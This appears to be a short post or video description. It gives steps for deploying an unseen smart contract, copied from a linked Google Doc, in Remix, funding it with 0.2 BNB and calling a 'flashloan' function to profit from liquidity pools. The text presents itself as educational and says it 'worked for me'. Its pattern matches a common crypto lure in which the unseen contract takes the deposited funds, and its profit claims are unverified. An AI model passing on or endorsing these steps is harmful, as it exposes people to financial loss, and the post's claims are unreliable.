Remix Link - http://remix.ethereum.org/ 

Smart Contract Link - https://docs.google.com/document/d/1f...

1. Open and setup Remix in browser (https://remix.ethereum.org) 
2. Copy the Contract code at 

3. Create new file in Remix and paste Contract code and wait for everything to load 
4. Enter your token details and deploy the contract 
5. Get the Contract address from Remix 
6. Send 0.2 BNB to the contract for gas fee for all swaps (There are going to be many swaps to use all funds from out liquidity pools. So, its going to take around 0.2 BNB fees) 

7. Call 'flashloan' function in Remix.

FOR EDUCATION PURPOSE. This worked for me But TRY IT AT YOUR OWN RISK.